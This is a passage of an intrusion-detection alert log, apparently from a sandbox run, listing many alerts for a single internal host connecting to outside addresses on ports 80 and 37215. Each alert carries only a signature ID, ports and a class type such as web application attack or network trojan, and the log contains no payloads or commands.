              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.20.206.6947260802025883 01/02/24-06:25:06.855559
              SID:2025883
              Source Port:47260
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2350.212.190.9749434802030092 01/02/24-06:25:07.021195
              SID:2030092
              Source Port:49434
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.12.30.8341074802030092 01/02/24-06:25:38.407130
              SID:2030092
              Source Port:41074
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.139.66.24949188802030092 01/02/24-06:24:49.080776
              SID:2030092
              Source Port:49188
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.124.143.18839152802025883 01/02/24-06:23:52.102637
              SID:2025883
              Source Port:39152
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23207.91.250.5347036802030092 01/02/24-06:24:05.701901
              SID:2030092
              Source Port:47036
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.247.27.1551010372152829579 01/02/24-06:24:09.783413
              SID:2829579
              Source Port:51010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2346.175.16.20649032802025883 01/02/24-06:24:48.996752
              SID:2025883
              Source Port:49032
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23186.88.83.19454168802030092 01/02/24-06:25:15.957336
              SID:2030092
              Source Port:54168
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.97.23040630372152829579 01/02/24-06:23:56.194246
              SID:2829579
              Source Port:40630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2354.87.227.16435480802025883 01/02/24-06:25:22.000530
              SID:2025883
              Source Port:35480
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.126.126.8152802802025883 01/02/24-06:25:30.150804
              SID:2025883
              Source Port:52802
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2346.101.163.10735924802025883 01/02/24-06:25:11.820546
              SID:2025883
              Source Port:35924
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.173.142.9934518802025883 01/02/24-06:24:45.911157
              SID:2025883
              Source Port:34518
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23108.186.112.3448840802025883 01/02/24-06:24:54.992165
              SID:2025883
              Source Port:48840
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.218.15.4344830802025883 01/02/24-06:24:34.799253
              SID:2025883
              Source Port:44830
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23107.172.87.20751544802030092 01/02/24-06:24:55.853118
              SID:2030092
              Source Port:51544
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2387.106.240.16348362802025883 01/02/24-06:25:18.777402
              SID:2025883
              Source Port:48362
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23124.160.184.25432982802030092 01/02/24-06:24:49.075744
              SID:2030092
              Source Port:32982
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23158.94.0.20659592802030092 01/02/24-06:24:09.082311
              SID:2030092
              Source Port:59592
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.242.70.14342204802030092 01/02/24-06:24:43.208181
              SID:2030092
              Source Port:42204
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23200.52.65.8038840802030092 01/02/24-06:25:07.011268
              SID:2030092
              Source Port:38840
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23191.96.205.19456586802030092 01/02/24-06:24:13.903880
              SID:2030092
              Source Port:56586
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.57.244.12937714802030092 01/02/24-06:25:07.005656
              SID:2030092
              Source Port:37714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2366.78.59.10240712802025883 01/02/24-06:25:15.619279
              SID:2025883
              Source Port:40712
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23200.159.177.3149306802025883 01/02/24-06:24:11.224156
              SID:2025883
              Source Port:49306
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.3.104.6048300802030092 01/02/24-06:25:07.011141
              SID:2030092
              Source Port:48300
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23160.242.101.24957992802030092 01/02/24-06:24:49.569096
              SID:2030092
              Source Port:57992
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23197.15.56.18050906802030092 01/02/24-06:24:01.084128
              SID:2030092
              Source Port:50906
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.211.249.21148824802030092 01/02/24-06:24:30.918981
              SID:2030092
              Source Port:48824
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.100.160.20360636802025883 01/02/24-06:25:11.730540
              SID:2025883
              Source Port:60636
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23155.159.137.860496802025883 01/02/24-06:24:33.306234
              SID:2025883
              Source Port:60496
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.63.254.14947840802025883 01/02/24-06:25:42.582550
              SID:2025883
              Source Port:47840
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2331.41.88.1257330802030092 01/02/24-06:24:41.167214
              SID:2030092
              Source Port:57330
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23169.53.132.23444342802030092 01/02/24-06:24:10.994021
              SID:2030092
              Source Port:44342
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.247.18.9351712372152835222 01/02/24-06:23:49.692291
              SID:2835222
              Source Port:51712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23143.0.84.21038402802025883 01/02/24-06:24:01.350138
              SID:2025883
              Source Port:38402
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2394.237.51.5260554802030092 01/02/24-06:24:20.104130
              SID:2030092
              Source Port:60554
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23109.196.234.1858414802030092 01/02/24-06:23:55.633320
              SID:2030092
              Source Port:58414
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23172.67.227.649236802030092 01/02/24-06:24:30.712225
              SID:2030092
              Source Port:49236
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2320.72.240.21243978802030092 01/02/24-06:24:23.654334
              SID:2030092
              Source Port:43978
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.146.189.2848810802025883 01/02/24-06:25:38.026986
              SID:2025883
              Source Port:48810
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2346.4.186.23653184802030092 01/02/24-06:24:54.906257
              SID:2030092
              Source Port:53184
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23197.26.123.21538682802030092 01/02/24-06:25:36.163559
              SID:2030092
              Source Port:38682
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.235.135.156.633424802025883 01/02/24-06:25:30.155873
              SID:2025883
              Source Port:33424
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23119.77.165.6058400802025883 01/02/24-06:23:55.158684
              SID:2025883
              Source Port:58400
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.223.213.8951292802030092 01/02/24-06:25:25.918831
              SID:2030092
              Source Port:51292
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.82.158.9850494802025883 01/02/24-06:24:08.856573
              SID:2025883
              Source Port:50494
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.192.122.6537722802025883 01/02/24-06:25:42.403229
              SID:2025883
              Source Port:37722
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.94.161.14533044802025883 01/02/24-06:24:17.563871
              SID:2025883
              Source Port:33044
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.209.88.19054520802030092 01/02/24-06:24:45.913931
              SID:2030092
              Source Port:54520
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2359.49.86.22544734802030092 01/02/24-06:24:27.489026
              SID:2030092
              Source Port:44734
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23184.27.51.3257188802030092 01/02/24-06:25:35.366173
              SID:2030092
              Source Port:57188
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23176.119.158.21950988802025883 01/02/24-06:24:35.189037
              SID:2025883
              Source Port:50988
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.23.98.20438590802030092 01/02/24-06:24:01.079300
              SID:2030092
              Source Port:38590
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.253.47.15437722372152835222 01/02/24-06:24:59.013684
              SID:2835222
              Source Port:37722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23110.161.237.5746168802025883 01/02/24-06:25:25.756167
              SID:2025883
              Source Port:46168
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23115.110.175.3654248802025883 01/02/24-06:25:42.911184
              SID:2025883
              Source Port:54248
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.215.216.4359224802025883 01/02/24-06:23:50.494104
              SID:2025883
              Source Port:59224
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23193.46.47.24236186802030092 01/02/24-06:25:30.204860
              SID:2030092
              Source Port:36186
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2389.116.58.16258488802025883 01/02/24-06:24:18.153621
              SID:2025883
              Source Port:58488
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.235.102.7249608372152829579 01/02/24-06:25:03.497048
              SID:2829579
              Source Port:49608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23145.236.36.12840926802025883 01/02/24-06:24:59.212800
              SID:2025883
              Source Port:40926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.194.11.19152908802025883 01/02/24-06:24:17.758398
              SID:2025883
              Source Port:52908
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.77.132.17740724802030092 01/02/24-06:24:18.209402
              SID:2030092
              Source Port:40724
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2394.152.11.20858652802025883 01/02/24-06:25:38.297923
              SID:2025883
              Source Port:58652
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2350.199.186.2553794802025883 01/02/24-06:24:08.558341
              SID:2025883
              Source Port:53794
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.11.236.14242078802025883 01/02/24-06:24:59.115435
              SID:2025883
              Source Port:42078
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2351.75.21.17840480802025883 01/02/24-06:25:02.016731
              SID:2025883
              Source Port:40480
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23167.82.120.6646464802030092 01/02/24-06:24:27.487383
              SID:2030092
              Source Port:46464
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23129.21.35.14555408802025883 01/02/24-06:24:59.028627
              SID:2025883
              Source Port:55408
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23160.121.60.20546956802030092 01/02/24-06:23:51.701184
              SID:2030092
              Source Port:46956
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23108.186.216.18145040802025883 01/02/24-06:23:51.959819
              SID:2025883
              Source Port:45040
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2350.87.38.1737480802030092 01/02/24-06:24:23.653878
              SID:2030092
              Source Port:37480
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.86.91.9035656802025883 01/02/24-06:24:50.099510
              SID:2025883
              Source Port:35656
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.242.176.1443110802025883 01/02/24-06:25:21.012628
              SID:2025883
              Source Port:43110
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23119.23.86.14936618802025883 01/02/24-06:25:42.547024
              SID:2025883
              Source Port:36618
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.15.103.2141670802025883 01/02/24-06:25:31.414284
              SID:2025883
              Source Port:41670
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.231.34.9059060802030092 01/02/24-06:24:27.279281
              SID:2030092
              Source Port:59060
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2320.65.30.21242196802025883 01/02/24-06:25:03.828276
              SID:2025883
              Source Port:42196
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23184.29.129.740722802030092 01/02/24-06:23:49.999892
              SID:2030092
              Source Port:40722
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2385.215.117.2442578802030092 01/02/24-06:24:01.338021
              SID:2030092
              Source Port:42578
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2389.212.109.24042828802030092 01/02/24-06:24:42.987046
              SID:2030092
              Source Port:42828
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.181.35.21934232802030092 01/02/24-06:23:57.729740
              SID:2030092
              Source Port:34232
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.55.6.5853198802025883 01/02/24-06:25:09.906087
              SID:2025883
              Source Port:53198
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2357.180.62.6834572802030092 01/02/24-06:24:44.984670
              SID:2030092
              Source Port:34572
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.235.212.32.240614802030092 01/02/24-06:24:03.060009
              SID:2030092
              Source Port:40614
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23195.210.122.20639926802025883 01/02/24-06:25:42.425489
              SID:2025883
              Source Port:39926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23107.167.54.15750366802030092 01/02/24-06:25:31.230783
              SID:2030092
              Source Port:50366
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2354.150.52.14052998802025883 01/02/24-06:24:24.012270
              SID:2025883
              Source Port:52998
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23152.200.138.8146794802025883 01/02/24-06:24:51.767454
              SID:2025883
              Source Port:46794
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.194.49.1647606802030092 01/02/24-06:24:41.187072
              SID:2030092
              Source Port:47606
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2399.79.174.3141104802030092 01/02/24-06:25:34.689900
              SID:2030092
              Source Port:41104
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2344.237.242.20252038802030092 01/02/24-06:24:36.865314
              SID:2030092
              Source Port:52038
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23202.75.28.17559818802025883 01/02/24-06:24:09.284359
              SID:2025883
              Source Port:59818
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.182.204.24235596802025883 01/02/24-06:25:43.130381
              SID:2025883
              Source Port:35596
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23147.161.173.436874802030092 01/02/24-06:24:27.401967
              SID:2030092
              Source Port:36874
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23212.162.84.18753220802030092 01/02/24-06:24:59.055810
              SID:2030092
              Source Port:53220
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23173.61.119.7736382802025883 01/02/24-06:23:51.529010
              SID:2025883
              Source Port:36382
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.25.41.24933472802030092 01/02/24-06:24:01.079195
              SID:2030092
              Source Port:33472
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.107.146.11748156802030092 01/02/24-06:24:01.091302
              SID:2030092
              Source Port:48156
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2357.180.216.7335048802030092 01/02/24-06:25:30.173193
              SID:2030092
              Source Port:35048
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.17.132.4749620802025883 01/02/24-06:24:34.942338
              SID:2025883
              Source Port:49620
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.198.222.19256304802025883 01/02/24-06:24:18.028834
              SID:2025883
              Source Port:56304
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23134.0.11.20345208802030092 01/02/24-06:24:03.999636
              SID:2030092
              Source Port:45208
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23172.121.35.8032926802030092 01/02/24-06:23:50.004340
              SID:2030092
              Source Port:32926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.129.5.23550818802025883 01/02/24-06:25:29.681948
              SID:2025883
              Source Port:50818
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.44.122.13056304802025883 01/02/24-06:24:35.077411
              SID:2025883
              Source Port:56304
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23188.166.210.13957904802030092 01/02/24-06:25:21.187951
              SID:2030092
              Source Port:57904
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.37.171.10453882802025883 01/02/24-06:24:30.942227
              SID:2025883
              Source Port:53882
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23117.52.81.22652076802030092 01/02/24-06:25:30.193653
              SID:2030092
              Source Port:52076
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2320.47.19.11445826802030092 01/02/24-06:23:56.133253
              SID:2030092
              Source Port:45826
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.244.163.22154766802030092 01/02/24-06:23:58.944015
              SID:2030092
              Source Port:54766
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2343.175.236.10258804802025883 01/02/24-06:25:44.028517
              SID:2025883
              Source Port:58804
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.214.139.1748916802030092 01/02/24-06:24:08.852245
              SID:2030092
              Source Port:48916
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2395.101.194.5540702802030092 01/02/24-06:25:10.079630
              SID:2030092
              Source Port:40702
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.155.199.10545054802025883 01/02/24-06:23:54.818570
              SID:2025883
              Source Port:45054
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.83.91.4142372802025883 01/02/24-06:24:06.101527
              SID:2025883
              Source Port:42372
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2359.151.128.1748314802025883 01/02/24-06:24:46.386584
              SID:2025883
              Source Port:48314
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2374.39.214.2346062802025883 01/02/24-06:25:15.627181
              SID:2025883
              Source Port:46062
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.12.99.17136038802025883 01/02/24-06:24:09.103574
              SID:2025883
              Source Port:36038
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.185.13.23641066802030092 01/02/24-06:24:40.775189
              SID:2030092
              Source Port:41066
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23186.39.8.7359120802030092 01/02/24-06:25:19.095834
              SID:2030092
              Source Port:59120
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2390.186.147.7442050802030092 01/02/24-06:24:54.920917
              SID:2030092
              Source Port:42050
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23178.128.227.10941330802030092 01/02/24-06:25:25.911068
              SID:2030092
              Source Port:41330
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23206.238.103.10546650802025883 01/02/24-06:24:08.700707
              SID:2025883
              Source Port:46650
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.225.210.1847310802030092 01/02/24-06:24:55.583858
              SID:2030092
              Source Port:47310
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2386.107.30.11541714802030092 01/02/24-06:25:35.089932
              SID:2030092
              Source Port:41714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.80.89.1760656802030092 01/02/24-06:25:31.932213
              SID:2030092
              Source Port:60656
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.231.214.84.941418802025883 01/02/24-06:25:32.217582
              SID:2025883
              Source Port:41418
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23162.243.164.3647712802025883 01/02/24-06:25:00.919883
              SID:2025883
              Source Port:47712
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23144.126.206.15750982802025883 01/02/24-06:24:28.177953
              SID:2025883
              Source Port:50982
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2367.207.70.10055198802025883 01/02/24-06:23:52.032969
              SID:2025883
              Source Port:55198
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.66.124.19643216802025883 01/02/24-06:24:31.144023
              SID:2025883
              Source Port:43216
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23150.60.155.8060130802030092 01/02/24-06:24:13.765423
              SID:2030092
              Source Port:60130
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23175.27.12.21960064802030092 01/02/24-06:25:32.237664
              SID:2030092
              Source Port:60064
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23216.137.174.13447390802025883 01/02/24-06:25:22.016894
              SID:2025883
              Source Port:47390
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.81.147.8654666802025883 01/02/24-06:23:51.956424
              SID:2025883
              Source Port:54666
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23213.235.69.15352566802025883 01/02/24-06:25:15.717215
              SID:2025883
              Source Port:52566
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.238.217.69.18058726802025883 01/02/24-06:24:01.420268
              SID:2025883
              Source Port:58726
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.252.147.12855178802030092 01/02/24-06:25:35.867202
              SID:2030092
              Source Port:55178
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23212.40.8.18758620802030092 01/02/24-06:24:23.995468
              SID:2030092
              Source Port:58620
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23205.186.128.848982802030092 01/02/24-06:24:27.336199
              SID:2030092
              Source Port:48982
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.181.35.21934120802025883 01/02/24-06:23:54.670611
              SID:2025883
              Source Port:34120
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23173.246.114.1738990802030092 01/02/24-06:24:15.084514
              SID:2030092
              Source Port:38990
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2320.244.147.18357646802025883 01/02/24-06:24:58.867978
              SID:2025883
              Source Port:57646
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2341.47.14.14559648802030092 01/02/24-06:24:55.990421
              SID:2030092
              Source Port:59648
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.215.63.14354620802030092 01/02/24-06:25:02.012429
              SID:2030092
              Source Port:54620
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.111.199.19550616802025883 01/02/24-06:24:14.253972
              SID:2025883
              Source Port:50616
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23170.61.215.22438188802030092 01/02/24-06:24:23.937077
              SID:2030092
              Source Port:38188
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23150.60.155.8060130802025883 01/02/24-06:24:13.765423
              SID:2025883
              Source Port:60130
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.142.2.15938786802030092 01/02/24-06:24:24.307205
              SID:2030092
              Source Port:38786
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.100.195.10552802802025883 01/02/24-06:25:15.214192
              SID:2025883
              Source Port:52802
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.250.225.1660966802025883 01/02/24-06:24:43.065656
              SID:2025883
              Source Port:60966
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23213.235.69.15352566802030092 01/02/24-06:25:15.717215
              SID:2030092
              Source Port:52566
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.55.87.22949346802025883 01/02/24-06:24:15.126337
              SID:2025883
              Source Port:49346
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
